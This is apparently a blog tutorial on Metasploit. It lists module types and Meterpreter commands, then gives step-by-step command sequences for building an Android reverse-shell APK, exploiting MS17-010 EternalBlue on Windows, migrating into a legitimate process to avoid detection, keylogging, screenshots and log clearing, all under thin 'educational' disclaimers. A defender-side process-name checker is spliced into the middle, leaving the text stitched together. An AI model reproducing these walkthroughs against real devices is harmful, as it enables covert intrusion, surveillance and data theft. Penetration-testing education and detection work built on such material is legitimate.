Metasploit - A Must-Have Pen Testing Tool for Security Engineers and Analysts
Disclaimer: This is strictly for educational purposes and to report on technical possibilities. Remember that this is a hacking tool, and one can face legal action for illegal usage.
Caution: Make a contract or agreement with any organization before using Metasploit on their systems, stay within the agreed limits, and follow the tool's permitted terms of use.
Prior to Metasploit, pen testers had to perform all probes manually, using a variety of tools that may or may not have supported the platform they were testing, writing their own code by hand, and introducing it onto networks manually. Remote testing was virtually unheard of, which limited a security specialist's reach to the local area, and companies spent a fortune on in-house IT or security consultants. Once Metasploit is installed, it is used to obtain information about the target, either through port scanning, OS fingerprinting, or a vulnerability scanner, to find a way into the network. Then it is a simple matter of selecting an exploit and your payload. The tool is used to develop and run exploit code on remote target systems. Metasploit comes pre-installed on the Kali Linux operating system. Metasploit provides deep customizability, giving pen testers full access to the source code and the ability to add custom modules. Metasploit integrates seamlessly with elements such as Windows patch enumeration and SNMP scanning during the information collection phase of a penetration test. It also provides a bridge to Tenable's vulnerability scanner, Nessus. Metasploit integrates with almost any reconnaissance tool, allowing you to identify the vulnerability you want.
When you find a vulnerability, you can search the extensible Metasploit database for an exploit that cracks it open. You then match the exploit to an appropriate payload for the task. Metasploit provides a full set of post-exploitation tools, with new features added each year. For example, one option is to create a persistent backdoor that remains on the machine even after a reboot. Other tools include packet sniffing, privilege escalators, screen capture, pivoters, and keyloggers. Metasploit also offers a fuzzer for identifying potential security flaws in binaries and an expanding selection of auxiliary modules. File system commands in Meterpreter are a set of commands that allow an attacker to manipulate and interact with the file system of a target system: retrieving files, uploading files, and creating new directories on the target. Once a weakness is identified, choose an exploit and payload to penetrate the chink in the armor. If the exploit is successful, the payload gets executed at the target, and the user gets a shell to interact with the payload. One of the most popular payloads for attacking Windows systems is Meterpreter, an in-memory-only interactive shell. Once on the target machine, Metasploit offers various post-exploitation tools for privilege escalation, packet sniffing, pass the hash, keyloggers, screen capture, plus pivoting tools. Users can also set up a persistent backdoor in case the target machine gets rebooted.
Auxiliary: An auxiliary module is a piece of code written to perform a particular task. Metasploit has more than 1,000 auxiliary modules that perform various tasks like scanning, fuzzing, sniffing, and much more. The auxiliary categories are: admin, analyze, bnat, client, crawler, docx, dos, fileformat, fuzzers, gather, parser, pdf, scanner, server, sniffer, spoof, sqli, voip, vsploit.
Payloads: If the exploit is successful, the payload gets executed at the target, and the user gets a shell to interact with the payload. The payload is the action that is performed after the exploit has completed. Metasploit has around 42 payloads that can be classified into (i) singles, (ii) stagers, and (iii) stages.
Exploits: The essence of the framework is to offer exploits that you can use for various vulnerabilities. An exploit is code that takes advantage of a software vulnerability or security flaw; you run this code against the target system to take advantage of the vulnerabilities present there. The categories of exploits available in Metasploit are: aix, android, apple_ios, bsdi, dialup, firefox, freebsd, hpux, irix, linux, mainframe, multi, netware, osx, solaris, unix, windows.
Encoders: Encoders help generate a wide variety of payloads that you can send to the target in multiple ways to perform a task without being detected by the security software on the target system. They use algorithms and techniques to remain unseen by detection software. The encoder categories are: cmd, generic, mipsbe, mipsle, php, ppc, ruby, sparc, x64, x86.
Post: Once basic entry is achieved using the exploits, one can make use of the post modules to further infiltrate the target system, and this must be done ethically. This is when lateral movement occurs, by escalating user privileges to administrator or root. The post module categories are: aix, android, cisco, firefox, hardware, juniper, linux, multi, osx, solaris, windows.
Evasion: Evasion modules allow the payload to run without being detected by the defender. Multiple techniques such as shellcode encryption, source code obfuscation, Metasm, and anti-emulation are used to achieve this.
Metasploit has multiple interfaces, including:
(1) msfconsole - an interactive command-line interface
(2) msfcli - a literal Linux command-line interface
(3) Armitage - a GUI-based third-party application
(4) msfweb - a browser-based interface
Now let us go into Metasploit in action.
Metasploit is a framework that helps to create payloads in apk, exe, and php formats that can be executed on the target machine; once the script starts running, it provides a reverse shell.
A reverse shell is when an attacker executes malicious code on the victim's machine, and it connects back to the attacker's machine, giving them access to the target computer.
TERMS:
RHOSTS: This stands for "Remote Hosts." It specifies the IP address or addresses of the target system(s) you are trying to exploit.
RPORT: This stands for "Remote Port." It specifies which port on the target system to attack. Often, services have default ports, like HTTP on port 80, but it can differ based on the configuration.
TARGETURI: This is the directory path on the target system the exploit will target. For example, if you're exploiting a web application, the TARGETURI might be the path to that application on the web server, such as /manager.
LHOST: This stands for "Local Host." It's the IP address of your machine (the attacker's machine), which will receive the connection from the exploited target.
LPORT: This stands for "Local Port." Like RPORT, this is the port on your machine that will listen for incoming connections from the target.
Payload: the backdoor file that is going to be used for the target OS, such as Windows, Linux, Mac, or Android.
The term "hacking" has been used for many years in different contexts. It is often called "cracking" when it refers to breaking into computers or networks for malicious purposes. Tools such as keyloggers and screen recorders are used for spying on someone else's device. They can be installed on the victim's machine without their knowledge or consent; once installed, they allow you to see everything that happens on the victim's computer and even take control of it remotely if desired. Windows hacking tools like Nmap, Nessus, Nikto, Kismet, NetStumbler, Acunetix, Netsparker,
and Intruder are used to hack Windows-based operating systems. A Metasploit penetration test begins with the information gathering phase, wherein Metasploit integrates with various reconnaissance tools like Nmap, SNMP scanning, Windows patch enumeration, and Nessus to find the vulnerable spot in your system. From there the flow is the one described above: choose an exploit and payload, obtain a shell such as Meterpreter, and continue with the post-exploitation tools.
Metasploit offers several payload types: command shell payloads that enable users to run scripts or arbitrary commands against a host; dynamic payloads that allow testers to generate unique payloads to evade antivirus software; Meterpreter payloads that allow users to commandeer device monitors using VNC and to take over sessions or upload and download files; and static payloads that enable port forwarding and communications between networks.
Some basics commands of Metasploit are search, back, info, help, and exit.
Network Commands
ipconfig: Show network interface configuration
portfwd: Forward packets
route: View / edit network routing table
Meterpreter Commands
sysinfo: Display system information
ps: List and display running processes
kill <PID>: Terminate a running process
getuid: Display user ID
upload / download: Upload or download a file
pwd / lpwd: Print working directory (remote / local)
cd / lcd: Change directory (remote / local)
cat: Display file content
bglist: Show background running scripts
bgrun: Run a script in the background
bgkill: Terminate a background script
background: Move the active session to the background
edit <FILE Name>: Edit a file in the vi editor
shell: Access a shell on the target machine
migrate <PID>: Switch to another process
idletime: Display idle time of the user
screenshot: Take a screenshot
clearev: Clear the system logs
? / help: Show all the commands
exit / quit: Exit the Meterpreter session
shutdown / reboot: Shut down or restart the system
use: Load an extension
channel: Show active channels
Handling Commands
getpid: Display the process ID
getuid: Display the user ID
ps: Display running processes
kill: Stop and terminate a process
getprivs: Enable and show as many privileges as possible
reg: Access the target machine's registry
shell: Access the target machine's shell
execute: Run a specified
migrate: Move to a given destination process ID
Interface/Output Commands
enumdesktops: Show all available desktops
getdesktop: Display the current desktop
keyscan_start: Start the keylogger on the target machine
keyscan_stop: Stop the keylogger on the target machine
setdesktop: Configure the desktop
keyscan_dump: Dump the keylogger content
MSFVenom Commands
SWITCH  SYNTAX                 DESCRIPTION
-p      -p <payload>           Payload to use; its standard options can be displayed with --list-options
-l      -l <type>              List modules of a type, i.e. payloads, encoders
-f      -f <format>            Output format
-e      -e <encoder>           Define which encoder to use
-a      -a <architecture>      Define which architecture to use
-s      -s <space>             Define the maximum payload size
-b      -b <characters>        Define the set of characters not to use
-i      -i <number of times>   Define the number of times to apply the encoder
-x      -x <file name>         Define a custom file to use as a template
-o      -o <output>            Save the payload to a file
-h      -h                     Help
How to Hack Your personal Android Phone
(Assume a port number, and use ifconfig or ipconfig to obtain your IP address depending on your operating system. Your phone and your computer have to be on the same network to carry out this ethical hack.)
Enter "msfvenom -p android/meterpreter/reverse_tcp LHOST={host} LPORT={port} -o main.apk"
Enter "clear"
Enter "msfconsole"
Enter "use exploit/multi/handler"
Enter "set payload android/meterpreter/reverse_tcp"
Enter "set LHOST XXX....your...IP...address"
Enter "set LPORT XXX....same port number you used in the first command"
Enter "exploit"
Expected response: [*] Started reverse TCP handler on xxx....ip..:...port no
Do not forget that a payload called "main.apk" was generated on your computer. Transfer that payload to your phone by email or any other means; if your phone is attached via Bluetooth or a physical connection, transfer the payload that way.
Once the payload called main.apk is on your phone, open it by clicking on it. Clicking and opening the payload leaves a message on the console that there is now access, and it takes you to the Meterpreter prompt. Complete access is now yours.
Enter "help" to see the various activities that can be carried out on the hacked phone. From that moment, you may do many things remotely with the hacked phone.
How to find vulnerabilities/weaknesses to hack in your personal Windows computer system.
Have your Kali Linux running on the side, then go to your targeted Windows computer.
Enter "ipconfig" to obtain the IPv4 address as the targeted IP address.
Back on your Kali Linux, enter "nmap ...ipv4 address obtained from the Windows machine" to scan it.
If the host/computer is reported as down, enter "nmap .....ipv4 address... -Pn".
A list of open ports will be shown. You may google what those open ports are meant for and the services they actually expose.
Enter "nmap ....ipv4..address -Pn -sV", where -sV probes the specific service version, and more useful information will be obtained.
To go to Metasploit, enter "sudo msfconsole"
and then search for what you want by using search as the first word. For example, enter "search smb" or "grep scanner search smb". A list of vulnerability attack options drops down; pick any type of possible vulnerability that is close to your area of interest.
For learning purposes, I will be picking "auxiliary/scanner/smb/smb_ms17_010". Exploiting MS17-010 most often leads to SYSTEM level access through Remote Code Execution (RCE) that returns a reverse shell to the attacker's machine. The most common method of exploiting MS17-010 is by using Metasploit's "windows/smb/ms17_010_eternalblue" module.
Enter "use auxiliary/scanner/smb/smb_ms17_010"
Enter "show options"
Enter "set RHOSTS .....ipv4 that we obtained earlier (targeted Windows machine)"
Enter "run". You should see some information displaying whether the system is vulnerable to the attack. So far we have found the vulnerabilities associated with the services on the system. Having found the vulnerabilities, how do we attack based on them?
Enter "search smb" or "grep exploit search smb". A list of exploits usable for ms17_010 drops down, and for this educational reason I am selecting:
Enter "use exploit/windows/smb/ms17_010_eternalblue" or "use exploit/windows/smb/ms17_010_psexec"
Enter "show options"
Enter "set RHOSTS .....ipv4 address of the Windows computer"
Enter "set payload"
Enter "set payload windows/" This will show a dropdown of all the possible payloads, from which you may choose one.
Enter "set payload windows/meterpreter/reverse_http". Do not forget that Google is our friend for any of the exploit and hacking jargon. Read extensively and your insights will be like fire.
Enter "show options"
Enter "exploit"
Enter "set LHOST" only if it is not already set; it will usually be set, as that is the live host. Use ifconfig to obtain your IP address as usual on Kali Linux.
At this point a Meterpreter session should be open, which indicates the Windows system has been hacked. This can be verified by:
Enter "sysinfo"
Enter "help" This will give all the commands to get control and usage of the hacked Windows computer.
Enter "ps" Lists all the processes running on the computer; one of them can be migrated into by entering:
Enter "migrate xxxx" (where xxxx is the PID of onedrive.exe). Migrating into another process reduces the chance of getting detected. More precisely, a process with a name generated by Metasploit (typically random alphanumeric characters, e.g., YIhXxjfm.exe) looks quite suspicious in the task manager.
Enter "screenshot" to save a screenshot to the folder that has onedrive.exe. Find the folder and double-click on it; then you have complete access to the hacked Windows computer.
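The migrate step relies on the observation that a randomly named Metasploit process stands out in Task Manager. As an added defender-side example (not part of the original article), the Python below turns that observation into a check: it walks a constructed process listing and flags 8-letter, mixed-case, vowel-poor names of the YIhXxjfm.exe kind, plus executables running from staging directories. The sample processes, the staging-directory list and the thresholds are assumptions.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample in the shape of a Meterpreter `ps` listing: (pid, name, path).
# Two entries imitate the random 8-letter names the article mentions (YIhXxjfm.exe).
SAMPLE_PROCESSES = [
    (412, "svchost.exe", r"C:\Windows\System32\svchost.exe"),
    (1208, "OneDrive.exe", r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe"),
    (3320, "YIhXxjfm.exe", r"C:\Users\alice\AppData\Local\Temp\YIhXxjfm.exe"),
    (3344, "explorer.exe", r"C:\Windows\explorer.exe"),
    (3900, "xdKqpLwz.exe", r"C:\Users\alice\Downloads\xdKqpLwz.exe"),
]

VOWELS = set("aeiouAEIOU")
# Directories where a freshly dropped payload often lands (assumption, not from the article).
STAGING_DIRS = {"temp", "downloads", "public"}


def looks_random(stem: str) -> bool:
    """Heuristic for Metasploit-style random names: exactly 8 letters, an upper-case
    letter somewhere after the first character, and very few vowels. CamelCase names
    such as OneDrive keep a normal vowel ratio and are not flagged."""
    if not re.fullmatch(r"[A-Za-z]{8}", stem):
        return False
    mixed_case = any(c.isupper() for c in stem[1:]) and any(c.islower() for c in stem)
    vowel_ratio = sum(c in VOWELS for c in stem) / len(stem)
    return mixed_case and vowel_ratio <= 0.25


def suspicious_processes(processes):
    """Return [(pid, name, reasons)] for entries that trip at least one heuristic."""
    findings = []
    for pid, name, path in processes:
        p = PureWindowsPath(path)
        reasons = []
        if looks_random(p.stem):
            reasons.append("random-looking 8-letter name")
        # Look at the directory components only, not the file name itself.
        if any(part.lower() in STAGING_DIRS for part in p.parts[:-1]):
            reasons.append("executing from a staging directory")
        if reasons:
            findings.append((pid, name, reasons))
    return findings


if __name__ == "__main__":
    for pid, name, reasons in suspicious_processes(SAMPLE_PROCESSES):
        print(f"PID {pid:>5} {name:<14} {'; '.join(reasons)}")
```

The name heuristic is deliberately narrow (8 letters is the default length the article's example shows); tune the length and vowel ratio to your own baseline of legitimate process names before alerting on it.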
How to exploit adobe_flash_shader_drawing_fill using commands is as follows:
Enter "use exploit/multi/browser/adobe_flash_shader_drawing_fill"
Enter "show options"
Enter "set SRVHOST ipv4 address......."
Enter "set srvport 80"
Enter "show options"
Enter "show payloads"
Enter "set payload linux/x86/exec"
Enter "show targets"
Enter "set target 1"
Enter "show payloads"
Enter "show advanced"
Enter "set DisplayablePayloadHandler true" (to change an advanced setting)
Enter "show encoders"
Enter "show nops"
Enter "show evasion"
How to gather information (Reconnaissance)
Enter "nmap -sT .....ipv4 address."
Enter "nmap -sS ......ipv4 address..."
Enter "search ssh_version" or "search phpMyAdmin"
Enter "use auxiliary/scanner/ssh/ssh_version"
Enter "options"
Enter "set RHOSTS ....ipv4 address."
Enter "set THREADS ....the value available on the screen..."
Enter "run"
Conclusion:
Metasploit can produce unwanted results. Many exploits are designed to exploit buffer overflows, race conditions, or other software vulnerabilities. These exploits pose a risk because triggering such vulnerabilities can destabilize the target system. Many exploits could lead to unexpected denial of service, application crashes, system restarts, and unexpected application behavior. Ensure that the organization ordering the penetration test has an emergency response plan to prepare for these situations. Metasploit is preferred to other highly paid penetration testing tools because it allows access to its source code and the addition of specific custom modules. The Metasploit Framework is an open-source pen testing and development platform that gives you access to the latest exploit code for various applications, operating systems, and platforms. You can leverage the power of the Metasploit Framework to create additional custom security tools or write your own exploit code for new vulnerabilities. Every reconnaissance tool you can think of integrates with Metasploit, making it possible to find the weaknesses. Once you have identified a weakness, hunt through Metasploit's large and extensible database for the exploit that will crack open that chink and get you in.